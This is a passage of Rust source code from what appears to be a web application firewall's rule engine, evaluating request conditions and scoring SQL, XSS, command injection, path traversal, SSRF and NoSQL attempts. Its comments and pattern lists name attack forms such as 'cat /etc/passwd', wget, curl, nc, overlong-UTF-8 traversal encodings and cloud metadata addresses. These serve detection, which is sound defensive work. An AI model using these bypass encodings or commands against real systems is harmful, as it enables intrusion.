843                        .unwrap_or(false)
844                }
845                None => false,
846            },
847            "request" => {
848                let raw = build_raw_request(ctx);
849                condition
850                    .match_value
851                    .as_ref()
852                    .and_then(|m| m.as_cond())
853                    .map(|child| {
854                        self.eval_condition(child, ctx, Some(&raw), trace, rule_id, depth + 1)
855                    })
856                    .unwrap_or(false)
857            }
858            "request_json" => match ctx.json_text.as_deref() {
859                Some(json_text) => condition
860                    .match_value
861                    .as_ref()
862                    .and_then(|m| m.as_cond())
863                    .map(|child| {
864                        self.eval_condition(child, ctx, Some(json_text), trace, rule_id, depth + 1)
865                    })
866                    .unwrap_or(true),
867                None => false,
868            },
869            "static_content" => condition
870                .match_value
871                .as_ref()
872                .and_then(|m| m.as_bool())
873                .map(|target| ctx.is_static == target)
874                .unwrap_or(false),
875            "compare" => eval_compare(condition, value),
876            "count_odd" => eval_count_odd(condition.match_value.as_ref(), value),
877            "sql_analyzer" => self.eval_sql_analyzer(condition, value, ctx, trace, rule_id, depth),
878            "xss_analyzer" => self.eval_xss_analyzer(condition, value, ctx, trace, rule_id, depth),
879            "cmd_analyzer" => self.eval_cmd_analyzer(condition, value, ctx, trace, rule_id, depth),
880            "path_traversal_analyzer" => {
881                self.eval_path_traversal_analyzer(condition, value, ctx, trace, rule_id, depth)
882            }
883            "ssrf_analyzer" => {
884                self.eval_ssrf_analyzer(condition, value, ctx, trace, rule_id, depth)
885            }
886            "nosql_analyzer" => {
887                self.eval_nosql_analyzer(condition, value, ctx, trace, rule_id, depth)
888            }
889            "hashset" => eval_hashset(condition.match_value.as_ref(), value),
890            "parse_multipart" => self.eval_parse_multipart(condition, ctx, trace, rule_id, depth),
891            "track_by_ip" => self.eval_track_by_ip(condition, ctx, trace, rule_id, depth),
892            "extract_argument" => self.eval_extract_argument(condition, ctx, trace, rule_id, depth),
893            "unique_count" => {
894                self.eval_unique_count(condition, ctx, value, &[], trace, rule_id, depth)
895            }
896            "count" => self.eval_count(condition, ctx, trace, rule_id, depth),
897            "remember_match" => condition
898                .match_value
899                .as_ref()
900                .and_then(|m| m.as_cond())
901                .map(|child| self.eval_condition(child, ctx, value, trace, rule_id, depth + 1))
902                .unwrap_or(false),
903            _ => false,
904        };
905
906        if trace.is_enabled() {
907            trace.emit(TraceEvent::ConditionEvaluated {
908                rule_id,
909                kind: condition.kind.clone(),
910                field: condition.field.clone(),
911                op: condition.op.clone(),
912                name: condition.name.clone(),
913                matched,
914            });
915        }
916
917        matched
918    }
919
920    fn eval_boolean(
921        &self,
922        condition: &MatchCondition,
923        ctx: &EvalContext,
924        value: Option<&str>,
925        trace: &mut TraceState,
926        rule_id: u32,
927        depth: u32,
928    ) -> bool {
929        let op = condition.op.as_deref().unwrap_or("and");
930        let Some(match_value) = condition.match_value.as_ref() else {
931            return true;
932        };
933
934        match op {
935            "and" => {
936                if let Some(items) = match_value.as_arr() {
937                    for item in items {
938                        let Some(child) = item.as_cond() else {
939                            continue;
940                        };
941                        if !self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
942                            return false;
943                        }
944                    }
945                    true
946                } else if let Some(child) = match_value.as_cond() {
947                    self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
948                } else {
949                    true
950                }
951            }
952            "or" => {
953                let mut saw_operand = false;
954                if let Some(items) = match_value.as_arr() {
955                    for item in items {
956                        let Some(child) = item.as_cond() else {
957                            continue;
958                        };
959                        saw_operand = true;
960                        if self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
961                            return true;
962                        }
963                    }
964                    !saw_operand
965                } else if let Some(child) = match_value.as_cond() {
966                    self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
967                } else {
968                    true
969                }
970            }
971            "not" => {
972                if let Some(items) = match_value.as_arr() {
973                    for item in items {
974                        let Some(child) = item.as_cond() else {
975                            continue;
976                        };
977                        if self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
978                            return false;
979                        }
980                    }
981                    true
982                } else if let Some(child) = match_value.as_cond() {
983                    !self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
984                } else {
985                    true
986                }
987            }
988            _ => false,
989        }
990    }
991
992    fn eval_method(
993        &self,
994        condition: &MatchCondition,
995        ctx: &EvalContext,
996        trace: &mut TraceState,
997        rule_id: u32,
998        depth: u32,
999    ) -> bool {
1000        let method = ctx.method;
1001        let Some(match_value) = condition.match_value.as_ref() else {
1002            return false;
1003        };
1004        if let Some(s) = match_value.as_str() {
1005            return method.eq_ignore_ascii_case(s);
1006        }
1007        if let Some(arr) = match_value.as_arr() {
1008            for item in arr {
1009                if let Some(s) = item.as_str() {
1010                    if method.eq_ignore_ascii_case(s) {
1011                        return true;
1012                    }
1013                }
1014            }
1015            return false;
1016        }
1017        if let Some(child) = match_value.as_cond() {
1018            return self.eval_condition(child, ctx, Some(method), trace, rule_id, depth + 1);
1019        }
1020        false
1021    }
1022
1023    fn eval_uri(
1024        &self,
1025        condition: &MatchCondition,
1026        ctx: &EvalContext,
1027        trace: &mut TraceState,
1028        rule_id: u32,
1029        depth: u32,
1030    ) -> bool {
1031        let uri = ctx.url;
1032        let Some(match_value) = condition.match_value.as_ref() else {
1033            return false;
1034        };
1035        if let Some(s) = match_value.as_str() {
1036            return uri.contains(s);
1037        }
1038        if let Some(child) = match_value.as_cond() {
1039            return self.eval_condition(child, ctx, Some(uri), trace, rule_id, depth + 1);
1040        }
1041        false
1042    }
1043
1044    fn eval_args(
1045        &self,
1046        condition: &MatchCondition,
1047        ctx: &EvalContext,
1048        trace: &mut TraceState,
1049        rule_id: u32,
1050        depth: u32,
1051    ) -> bool {
1052        let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
1053            return false;
1054        };
1055        for candidate in &ctx.args {
1056            if self.eval_condition(child, ctx, Some(candidate), trace, rule_id, depth + 1) {
1057                return true;
1058            }
1059        }
1060        false
1061    }
1062
1063    fn eval_named_argument(
1064        &self,
1065        condition: &MatchCondition,
1066        ctx: &EvalContext,
1067        trace: &mut TraceState,
1068        rule_id: u32,
1069        depth: u32,
1070    ) -> bool {
1071        let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
1072            return false;
1073        };
1074        let name = condition.name.as_deref().unwrap_or("*");
1075        for entry in &ctx.arg_entries {
1076            if (name == "*" || entry.key == name)
1077                && self.eval_condition(child, ctx, Some(&entry.value), trace, rule_id, depth + 1)
1078            {
1079                return true;
1080            }
1081        }
1082        false
1083    }
1084
1085    fn eval_header(
1086        &self,
1087        condition: &MatchCondition,
1088        ctx: &EvalContext,
1089        trace: &mut TraceState,
1090        rule_id: u32,
1091        depth: u32,
1092    ) -> bool {
1093        if let Some(direction) = condition.direction.as_deref() {
1094            if direction != "c2s" {
1095                return false;
1096            }
1097        }
1098        let Some(field) = condition.field.as_deref() else {
1099            return false;
1100        };
1101        let header_value = get_header_value(&ctx.headers, field);
1102        let Some(header_value) = header_value else {
1103            return false;
1104        };
1105        if condition.match_value.is_none() {
1106            return true;
1107        }
1108        let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
1109            return false;
1110        };
1111        self.eval_condition(child, ctx, Some(header_value), trace, rule_id, depth + 1)
1112    }
1113
1114    fn eval_regex(&self, match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1115        let Some(value) = value else {
1116            return false;
1117        };
1118        let Some(pattern) = match_value.and_then(|m| m.as_str()) else {
1119            return false;
1120        };
1121        let Some(re) = self.regex_cache.get(pattern) else {
1122            return false;
1123        };
1124        re.is_match(value)
1125    }
1126
1127    fn eval_word(&self, match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1128        let Some(value) = value else {
1129            return false;
1130        };
1131        let Some(word) = match_value.and_then(|m| m.as_str()) else {
1132            return false;
1133        };
1134        if let Some(re) = self.word_regex_cache.get(word) {
1135            return re.is_match(value);
1136        }
1137        // Fallback
1138        let pattern = format!(r"(?i)\b{}\b", regex::escape(word));
1139        let Ok(re) = RegexBuilder::new(&pattern).multi_line(true).build() else {
1140            return false;
1141        };
1142        re.is_match(value)
1143    }
1144
1145    fn eval_sql_analyzer(
1146        &self,
1147        condition: &MatchCondition,
1148        value: Option<&str>,
1149        ctx: &EvalContext,
1150        trace: &mut TraceState,
1151        rule_id: u32,
1152        depth: u32,
1153    ) -> bool {
1154        let Some(value) = value else {
1155            return false;
1156        };
1157        let score = sql_analyzer_score(value);
1158        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1159            Some(child) => self.eval_condition(
1160                child,
1161                ctx,
1162                Some(&score.to_string()),
1163                trace,
1164                rule_id,
1165                depth + 1,
1166            ),
1167            None => score > 0,
1168        }
1169    }
1170
1171    fn eval_xss_analyzer(
1172        &self,
1173        condition: &MatchCondition,
1174        value: Option<&str>,
1175        ctx: &EvalContext,
1176        trace: &mut TraceState,
1177        rule_id: u32,
1178        depth: u32,
1179    ) -> bool {
1180        let Some(value) = value else {
1181            return false;
1182        };
1183        let score = xss_analyzer_score(value);
1184        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1185            Some(child) => self.eval_condition(
1186                child,
1187                ctx,
1188                Some(&score.to_string()),
1189                trace,
1190                rule_id,
1191                depth + 1,
1192            ),
1193            None => score > 0,
1194        }
1195    }
1196
1197    fn eval_cmd_analyzer(
1198        &self,
1199        condition: &MatchCondition,
1200        value: Option<&str>,
1201        ctx: &EvalContext,
1202        trace: &mut TraceState,
1203        rule_id: u32,
1204        depth: u32,
1205    ) -> bool {
1206        let Some(value) = value else {
1207            return false;
1208        };
1209        let score = cmd_analyzer_score(value);
1210        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1211            Some(child) => self.eval_condition(
1212                child,
1213                ctx,
1214                Some(&score.to_string()),
1215                trace,
1216                rule_id,
1217                depth + 1,
1218            ),
1219            None => score > 0,
1220        }
1221    }
1222
1223    fn eval_path_traversal_analyzer(
1224        &self,
1225        condition: &MatchCondition,
1226        value: Option<&str>,
1227        ctx: &EvalContext,
1228        trace: &mut TraceState,
1229        rule_id: u32,
1230        depth: u32,
1231    ) -> bool {
1232        let Some(value) = value else {
1233            return false;
1234        };
1235        let score = path_traversal_analyzer_score(value);
1236        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1237            Some(child) => self.eval_condition(
1238                child,
1239                ctx,
1240                Some(&score.to_string()),
1241                trace,
1242                rule_id,
1243                depth + 1,
1244            ),
1245            None => score > 0,
1246        }
1247    }
1248
1249    /// Evaluate SSRF analyzer condition.
1250    ///
1251    /// SECURITY: Detects Server-Side Request Forgery attempts targeting internal
1252    /// services, cloud metadata endpoints, and dangerous URL schemes.
1253    fn eval_ssrf_analyzer(
1254        &self,
1255        condition: &MatchCondition,
1256        value: Option<&str>,
1257        ctx: &EvalContext,
1258        trace: &mut TraceState,
1259        rule_id: u32,
1260        depth: u32,
1261    ) -> bool {
1262        let Some(value) = value else {
1263            return false;
1264        };
1265        let score = ssrf_analyzer_score(value);
1266        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1267            Some(child) => self.eval_condition(
1268                child,
1269                ctx,
1270                Some(&score.to_string()),
1271                trace,
1272                rule_id,
1273                depth + 1,
1274            ),
1275            None => score > 0,
1276        }
1277    }
1278
1279    /// Evaluate NoSQL injection analyzer condition.
1280    ///
1281    /// SECURITY: Detects NoSQL injection attempts targeting MongoDB, CouchDB,
1282    /// Redis, Cassandra, and other document/key-value stores.
1283    fn eval_nosql_analyzer(
1284        &self,
1285        condition: &MatchCondition,
1286        value: Option<&str>,
1287        ctx: &EvalContext,
1288        trace: &mut TraceState,
1289        rule_id: u32,
1290        depth: u32,
1291    ) -> bool {
1292        let Some(value) = value else {
1293            return false;
1294        };
1295        let score = nosql_analyzer_score(value);
1296        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1297            Some(child) => self.eval_condition(
1298                child,
1299                ctx,
1300                Some(&score.to_string()),
1301                trace,
1302                rule_id,
1303                depth + 1,
1304            ),
1305            None => score > 0,
1306        }
1307    }
1308
1309    fn eval_parse_multipart(
1310        &self,
1311        condition: &MatchCondition,
1312        ctx: &EvalContext,
1313        trace: &mut TraceState,
1314        rule_id: u32,
1315        depth: u32,
1316    ) -> bool {
1317        let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
1318            return false;
1319        };
1320        let raw_bytes: &[u8] = if let Some(body_text) = ctx.body_text {
1321            body_text.as_bytes()
1322        } else if let Some(raw) = ctx.raw_body {
1323            raw
1324        } else {
1325            return false;
1326        };
1327        let content_type = ctx.headers.get("content-type").copied().unwrap_or("");
1328        let Some(boundary) = extract_multipart_boundary(content_type) else {
1329            return false;
1330        };
1331        let values = parse_multipart_values(raw_bytes, &boundary);
1332        for part_value in &values {
1333            if self.eval_condition(child, ctx, Some(part_value), trace, rule_id, depth + 1) {
1334                return true;
1335            }
1336        }
1337        false
1338    }
1339
1340    fn eval_track_by_ip(
1341        &self,
1342        condition: &MatchCondition,
1343        ctx: &EvalContext,
1344        trace: &mut TraceState,
1345        rule_id: u32,
1346        depth: u32,
1347    ) -> bool {
1348        let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
1349            return false;
1350        };
1351        self.process_track_condition(child, ctx, Vec::new(), trace, rule_id, depth + 1)
1352    }
1353
1354    fn eval_extract_argument(
1355        &self,
1356        condition: &MatchCondition,
1357        ctx: &EvalContext,
1358        trace: &mut TraceState,
1359        rule_id: u32,
1360        depth: u32,
1361    ) -> bool {
1362        let selector = condition.selector.as_deref();
1363        let extracted = select_argument_values(self, selector, ctx);
1364        if extracted.is_empty() {
1365            return false;
1366        }
1367        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1368            Some(child) => {
1369                self.process_track_condition(child, ctx, extracted, trace, rule_id, depth + 1)
1370            }
1371            None => true,
1372        }
1373    }
1374
1375    fn eval_unique_count(
1376        &self,
1377        condition: &MatchCondition,
1378        ctx: &EvalContext,
1379        value: Option<&str>,
1380        values: &[String],
1381        trace: &mut TraceState,
1382        rule_id: u32,
1383        depth: u32,
1384    ) -> bool {
1385        let timeframe = condition.timeframe.unwrap_or(60);
1386        let trace_label = "unique_count";
1387
1388        let values_to_record: Vec<String> = if !values.is_empty() {
1389            values.to_vec()
1390        } else if let Some(v) = value {
1391            vec![v.to_string()]
1392        } else {
1393            Vec::new()
1394        };
1395
1396        let unique_count = {
1397            let mut store = self.store.write();
1398            if values_to_record.is_empty() {
1399                store.get_unique_count(ctx.ip, trace_label, timeframe)
1400            } else {
1401                store.record_unique_values(ctx.ip, trace_label, &values_to_record, timeframe)
1402            }
1403        };
1404
1405        if let Some(mv) = condition.match_value.as_ref() {
1406            if let Some(child) = mv.as_cond() {
1407                return self.eval_condition(
1408                    child,
1409                    ctx,
1410                    Some(&unique_count.to_string()),
1411                    trace,
1412                    rule_id,
1413                    depth + 1,
1414                );
1415            }
1416            if let Some(num) = mv.as_num() {
1417                return unique_count as f64 >= num;
1418            }
1419        }
1420
1421        if let Some(count) = condition.count {
1422            unique_count as u64 >= count
1423        } else {
1424            unique_count > 0
1425        }
1426    }
1427
1428    fn eval_count(
1429        &self,
1430        condition: &MatchCondition,
1431        ctx: &EvalContext,
1432        trace: &mut TraceState,
1433        rule_id: u32,
1434        depth: u32,
1435    ) -> bool {
1436        let timeframe = condition.timeframe.unwrap_or(60);
1437        let trace_label = "count";
1438
1439        if let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1440            if !self.eval_condition(child, ctx, None, trace, rule_id, depth + 1) {
1441                return false;
1442            }
1443        }
1444
1445        let count = {
1446            let mut store = self.store.write();
1447            store.record_event(ctx.ip, trace_label, timeframe)
1448        };
1449
1450        let threshold = condition.count.unwrap_or(1);
1451        count as u64 >= threshold
1452    }
1453
1454    fn process_track_condition(
1455        &self,
1456        condition: &MatchCondition,
1457        ctx: &EvalContext,
1458        values: Vec<String>,
1459        trace: &mut TraceState,
1460        rule_id: u32,
1461        depth: u32,
1462    ) -> bool {
1463        match condition.kind.as_str() {
1464            "extract_argument" => {
1465                let selector = condition.selector.as_deref();
1466                let extracted = select_argument_values(self, selector, ctx);
1467                if extracted.is_empty() {
1468                    return false;
1469                }
1470                match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1471                    Some(child) => self.process_track_condition(
1472                        child,
1473                        ctx,
1474                        extracted,
1475                        trace,
1476                        rule_id,
1477                        depth + 1,
1478                    ),
1479                    None => {
1480                        let mut store = self.store.write();
1481                        store.record_unique_values(ctx.ip, "extract", &extracted, 60);
1482                        true
1483                    }
1484                }
1485            }
1486            "unique_count" => {
1487                self.eval_unique_count(condition, ctx, None, &values, trace, rule_id, depth + 1)
1488            }
1489            "count" => self.eval_count(condition, ctx, trace, rule_id, depth + 1),
1490            _ => {
1491                let candidate = values.first().map(|s| s.as_str());
1492                self.eval_condition(condition, ctx, candidate, trace, rule_id, depth + 1)
1493            }
1494        }
1495    }
1496}
1497
1498// Helper functions
1499
1500fn compute_available_features(ctx: &EvalContext) -> u16 {
1501    let mut out = 0u16;
1502    if !ctx.args.is_empty() {
1503        out |= REQ_ARGS;
1504    }
1505    if !ctx.arg_entries.is_empty() {
1506        out |= REQ_ARG_ENTRIES;
1507    }
1508    let has_body = ctx.body_text.is_some() || ctx.raw_body.is_some();
1509    if has_body {
1510        out |= REQ_BODY;
1511    }
1512    if ctx.json_text.is_some() {
1513        out |= REQ_JSON;
1514    }
1515    out
1516}
1517
1518fn compute_request_header_mask(index: &RuleIndex, headers: &HashMap<String, &str>) -> u64 {
1519    let mut mask = 0u64;
1520    for (bit, header) in index.header_bits.iter().enumerate() {
1521        if bit >= 64 {
1522            break;
1523        }
1524        if headers.contains_key(header) {
1525            mask |= 1u64 << bit;
1526        }
1527    }
1528    mask
1529}
1530
1531fn get_header_value<'a>(headers: &'a HashMap<String, &'a str>, field: &str) -> Option<&'a str> {
1532    let key = field.to_ascii_lowercase();
1533    headers
1534        .get(&key)
1535        .copied()
1536        .or_else(|| headers.get(field).copied())
1537}
1538
1539fn eval_contains(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1540    let Some(value) = value else {
1541        return false;
1542    };
1543    let Some(s) = match_value.and_then(|m| m.as_str()) else {
1544        return false;
1545    };
1546    value.contains(s)
1547}
1548
1549fn eval_starts_with(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1550    let Some(value) = value else {
1551        return false;
1552    };
1553    let Some(s) = match_value.and_then(|m| m.as_str()) else {
1554        return false;
1555    };
1556    value.starts_with(s)
1557}
1558
1559fn eval_equals(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1560    let Some(value) = value else {
1561        return false;
1562    };
1563    let Some(s) = match_value.and_then(|m| m.as_str()) else {
1564        return false;
1565    };
1566    value == s
1567}
1568
1569fn eval_multiple_contains(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1570    let Some(value) = value else {
1571        return false;
1572    };
1573    let Some(arr) = match_value.and_then(|m| m.as_arr()) else {
1574        return false;
1575    };
1576    for item in arr {
1577        if let Some(s) = item.as_str() {
1578            if value.contains(s) {
1579                return true;
1580            }
1581        }
1582    }
1583    false
1584}
1585
1586fn eval_hashset(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1587    let Some(value) = value else {
1588        return false;
1589    };
1590    let Some(arr) = match_value.and_then(|m| m.as_arr()) else {
1591        return false;
1592    };
1593    for item in arr {
1594        if let Some(s) = item.as_str() {
1595            if s.eq_ignore_ascii_case(value) {
1596                return true;
1597            }
1598        }
1599    }
1600    false
1601}
1602
1603fn eval_compare(condition: &MatchCondition, candidate: Option<&str>) -> bool {
1604    let Some(candidate) = candidate else {
1605        return false;
1606    };
1607    let Ok(candidate_num) = candidate.parse::<f64>() else {
1608        return false;
1609    };
1610    let Some(target) = condition.match_value.as_ref().and_then(|m| m.as_num()) else {
1611        return false;
1612    };
1613    let op = condition.op.as_deref().unwrap_or("eq");
1614    match op {
1615        "gte" => candidate_num >= target,
1616        "lte" => candidate_num <= target,
1617        "gt" => candidate_num > target,
1618        "lt" => candidate_num < target,
1619        "eq" => candidate_num == target,
1620        _ => false,
1621    }
1622}
1623
1624fn eval_count_odd(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1625    let Some(value) = value else {
1626        return false;
1627    };
1628    let Some(needle) = match_value.and_then(|m| m.as_str()) else {
1629        return false;
1630    };
1631    if needle.is_empty() {
1632        return false;
1633    }
1634    let count = value.matches(needle).count();
1635    count % 2 == 1
1636}
1637
1638fn sql_analyzer_score(value: &str) -> u32 {
1639    if SQL_KEYWORDS.is_match(value)
1640        || SQL_PHRASES.is_match(value)
1641        || SQL_OR_AND_EQ.is_match(value)
1642        || SQL_COMMENT_1.is_match(value)
1643        || SQL_COMMENT_2.is_match(value)
1644        || SQL_SHUTDOWN.is_match(value)
1645    {
1646        1
1647    } else {
1648        0
1649    }
1650}
1651
1652/// Analyzes a value for command injection patterns.
1653///
1654/// SECURITY: Detects OS command injection attempts including:
1655/// - Backtick command execution: `cmd`
1656/// - Subshell command substitution: $(cmd)
1657/// - Variable substitution: ${IFS}, ${PATH}
1658/// - Newline injection: %0a, %0d, literal newlines
1659/// - Command chaining: ; | && ||
1660/// - Brace expansion: {cmd1,cmd2}
1661/// - Dangerous commands: cat /etc/passwd, wget, curl, nc, etc.
1662/// - Redirection: > >> < 2>&1
1663/// - Null byte injection: %00
1664fn cmd_analyzer_score(value: &str) -> u32 {
1665    // First check the raw value
1666    if check_cmd_patterns(value) {
1667        return 1;
1668    }
1669
1670    // URL-decode and check again (handles %0a, %00, etc.)
1671    let decoded = safe_percent_decode(value);
1672    if decoded != value && check_cmd_patterns(&decoded) {
1673        return 1;
1674    }
1675
1676    // Double-decode for nested encoding
1677    if decoded.contains('%') {
1678        let double_decoded = safe_percent_decode(&decoded);
1679        if double_decoded != decoded && check_cmd_patterns(&double_decoded) {
1680            return 1;
1681        }
1682    }
1683
1684    0
1685}
1686
1687/// Check command injection patterns against a value.
1688///
1689/// Returns true if any command injection pattern is detected.
1690/// The patterns are ordered roughly by severity/likelihood.
1691#[inline]
1692fn check_cmd_patterns(value: &str) -> bool {
1693    // High-severity patterns (definite command injection)
1694    CMD_BACKTICK.is_match(value)
1695        || CMD_SUBSHELL.is_match(value)
1696        || CMD_DANGEROUS.is_match(value)
1697        // IFS manipulation (common bypass)
1698        || CMD_IFS.is_match(value)
1699        // Variable substitution (${var})
1700        || CMD_VAR_SUBST.is_match(value)
1701        // Newline injection (decoded)
1702        || CMD_NEWLINE_LITERAL.is_match(value)
1703        // Encoded newlines (not yet decoded)
1704        || CMD_NEWLINE_ENCODED.is_match(value)
1705        // Null byte injection
1706        || CMD_NULL_BYTE.is_match(value)
1707        // Brace expansion
1708        || CMD_BRACE.is_match(value)
1709        // Command chaining (be careful: could match URLs with &&)
1710        // Only flag if combined with other suspicious patterns
1711        || (CMD_CHAIN.is_match(value) && has_cmd_context(value))
1712        // Redirection with command context
1713        || (CMD_REDIRECT.is_match(value) && has_cmd_context(value))
1714        // Path traversal with command context
1715        || (CMD_PATH_TRAVERSAL.is_match(value) && has_cmd_context(value))
1716}
1717
1718/// Check if value has command execution context (to reduce false positives).
1719#[inline]
1720fn has_cmd_context(value: &str) -> bool {
1721    // Look for signs of command execution context
1722    value.contains('`')
1723        || value.contains("$(")
1724        || value.contains("${")
1725        || CMD_DANGEROUS.is_match(value)
1726        || value.contains("/bin/")
1727        || value.contains("/usr/bin/")
1728        || value.contains("/etc/")
1729        || value.contains("/tmp/")
1730        || value.contains("/dev/")
1731}
1732
1733/// Analyzes a value for path traversal patterns.
1734///
1735/// SECURITY: Detects directory traversal attacks including:
1736/// - Basic: ../, ..\
1737/// - URL-encoded: %2e%2e%2f
1738/// - Double-encoded: %252e%252e%252f
1739/// - Unicode/overlong UTF-8: %c0%ae, %c0%af
1740/// - Null byte truncation: %00
1741/// - Sensitive file targets: /etc/passwd, boot.ini
1742fn path_traversal_analyzer_score(value: &str) -> u32 {
1743    // First check the raw value
1744    if check_path_traversal_patterns(value) {
1745        return 1;
1746    }
1747
1748    // URL-decode and check again
1749    let decoded = safe_percent_decode(value);
1750    if decoded != value && check_path_traversal_patterns(&decoded) {
1751        return 1;
1752    }
1753
1754    // Double-decode for nested encoding bypass
1755    if decoded.contains('%') {
1756        let double_decoded = safe_percent_decode(&decoded);
1757        if double_decoded != decoded && check_path_traversal_patterns(&double_decoded) {
1758            return 1;
1759        }
1760
1761        // Triple-decode for extreme cases
1762        if double_decoded.contains('%') {
1763            let triple_decoded = safe_percent_decode(&double_decoded);
1764            if triple_decoded != double_decoded && check_path_traversal_patterns(&triple_decoded) {
1765                return 1;
1766            }
1767        }
1768    }
1769
1770    // Check for Unicode normalization bypasses
1771    let normalized = normalize_unicode_path(value);
1772    if normalized != value && check_path_traversal_patterns(&normalized) {
1773        return 1;
1774    }
1775
1776    0
1777}
1778
1779/// Check path traversal patterns against a value.
1780#[inline]
1781fn check_path_traversal_patterns(value: &str) -> bool {
1782    // Basic patterns
1783    PATH_TRAV_BASIC.is_match(value)
1784        // URL-encoded patterns (check even on decoded values for partial encoding)
1785        || PATH_TRAV_ENCODED.is_match(value)
1786        // Double-encoded patterns
1787        || PATH_TRAV_DOUBLE.is_match(value)
1788        // Unicode/overlong UTF-8 patterns
1789        || PATH_TRAV_UNICODE.is_match(value)
1790        // Backslash variants
1791        || PATH_TRAV_BACKSLASH.is_match(value)
1792        // Null byte injection
1793        || PATH_TRAV_NULL.is_match(value)
1794        // Sensitive targets (only if path traversal context present)
1795        || (has_traversal_context(value) && check_sensitive_targets(value))
1796}
1797
1798/// Check if value contains path traversal context.
1799#[inline]
1800fn has_traversal_context(value: &str) -> bool {
1801    value.contains("..")
1802        || value.contains("%2e")
1803        || value.contains("%2E")
1804        || value.contains("%c0")
1805        || value.contains("%C0")
1806}
1807
1808/// Check for sensitive file targets.
1809#[inline]
1810fn check_sensitive_targets(value: &str) -> bool {
1811    PATH_TRAV_TARGETS_UNIX.is_match(value) || PATH_TRAV_TARGETS_WIN.is_match(value)
1812}
1813
1814/// Normalize Unicode/overlong UTF-8 encoded paths.
1815///
1816/// Handles common overlong UTF-8 encoding bypasses:
1817/// - %c0%ae -> '.'
1818/// - %c0%af -> '/'
1819/// - %c1%9c -> '\'
1820fn normalize_unicode_path(value: &str) -> String {
1821    let mut result = value.to_string();
1822
1823    // Overlong UTF-8 encodings of '.'
1824    result = result
1825        .replace("%c0%ae", ".")
1826        .replace("%C0%AE", ".")
1827        .replace("%c0%2e", ".")
1828        .replace("%C0%2E", ".")
1829        .replace("%e0%80%ae", ".")
1830        .replace("%E0%80%AE", ".");
1831
1832    // Overlong UTF-8 encodings of '/'
1833    result = result
1834        .replace("%c0%af", "/")
1835        .replace("%C0%AF", "/")
1836        .replace("%e0%80%af", "/")
1837        .replace("%E0%80%AF", "/");
1838
1839    // Overlong UTF-8 encodings of '\'
1840    result = result
1841        .replace("%c1%9c", "\\")
1842        .replace("%C1%9C", "\\")
1843        .replace("%c1%1c", "\\")
1844        .replace("%C1%1C", "\\");
1845
1846    result
1847}
1848
1849/// Analyzes a value for SSRF (Server-Side Request Forgery) patterns.
1850///
1851/// SECURITY: Detects SSRF attempts targeting:
1852/// - Localhost (127.0.0.1, ::1)
1853/// - Cloud metadata endpoints (169.254.169.254, metadata.google.internal)
1854/// - Private IP ranges (10.x.x.x, 192.168.x.x, 172.16-31.x.x)
1855/// - IPv6-mapped IPv4 bypass attempts (::ffff:127.0.0.1)
1856/// - Dangerous URL schemes (file://, gopher://, dict://, etc.)
1857/// - Encoded IP bypasses (decimal, hex, octal representations)
1858///
1859/// Returns 1 if SSRF patterns are detected, 0 otherwise.
1860fn ssrf_analyzer_score(value: &str) -> u32 {
1861    // Check raw value first
1862    if check_ssrf_patterns(value) {
1863        return 1;
1864    }
1865
1866    // URL-decode and check again (handles %2f -> /, etc.)
1867    let decoded = safe_percent_decode(value);
1868    if decoded != value && check_ssrf_patterns(&decoded) {
1869        return 1;
1870    }
1871
1872    // Double-decode for nested encoding bypass
1873    if decoded.contains('%') {
1874        let double_decoded = safe_percent_decode(&decoded);
1875        if double_decoded != decoded && check_ssrf_patterns(&double_decoded) {
1876            return 1;
1877        }
1878    }
1879
1880    0
1881}
1882
1883/// Check SSRF patterns against a value.
1884///
1885/// SECURITY: This function is critical for SSRF prevention. It checks for:
1886/// - Internal IP addresses in URLs
1887/// - Cloud metadata endpoints
1888/// - Dangerous URL schemes
1889#[inline]
1890fn check_ssrf_patterns(value: &str) -> bool {
1891    // Dangerous URL schemes (highest priority - always block)
1892    SSRF_DANGEROUS_SCHEME.is_match(value)
1893        // Cloud metadata endpoints (CRITICAL - AWS/GCP/Azure instance metadata)
1894        || SSRF_CLOUD_METADATA.is_match(value)
1895        || SSRF_METADATA_HOST.is_match(value)
1896        // Localhost addresses (IPv4 and IPv6)
1897        || SSRF_LOCALHOST_V4.is_match(value)
1898        || SSRF_LOCALHOST_V6.is_match(value)
1899        // IPv6-mapped IPv4 bypass attempts
1900        || SSRF_MAPPED_IPV6.is_match(value)
1901        // Private IP ranges
1902        || SSRF_PRIVATE_IP.is_match(value)
1903        // Link-local addresses
1904        || SSRF_LINK_LOCAL.is_match(value)
1905        // Encoded IP bypasses (decimal/hex/octal)
1906        || SSRF_ENCODED_IP.is_match(value)
1907}
1908
1909/// Analyzes a value for NoSQL injection patterns.
1910///
1911/// SECURITY: Detects NoSQL injection attempts including:
1912/// - MongoDB operator injection ($where, $ne, $gt, etc.)
1913/// - MongoDB $where JavaScript execution (HIGH RISK)
1914/// - MongoDB authentication bypass patterns
1915/// - MongoDB aggregation pipeline injection
1916/// - CouchDB special endpoints (_all_docs, _view, etc.)
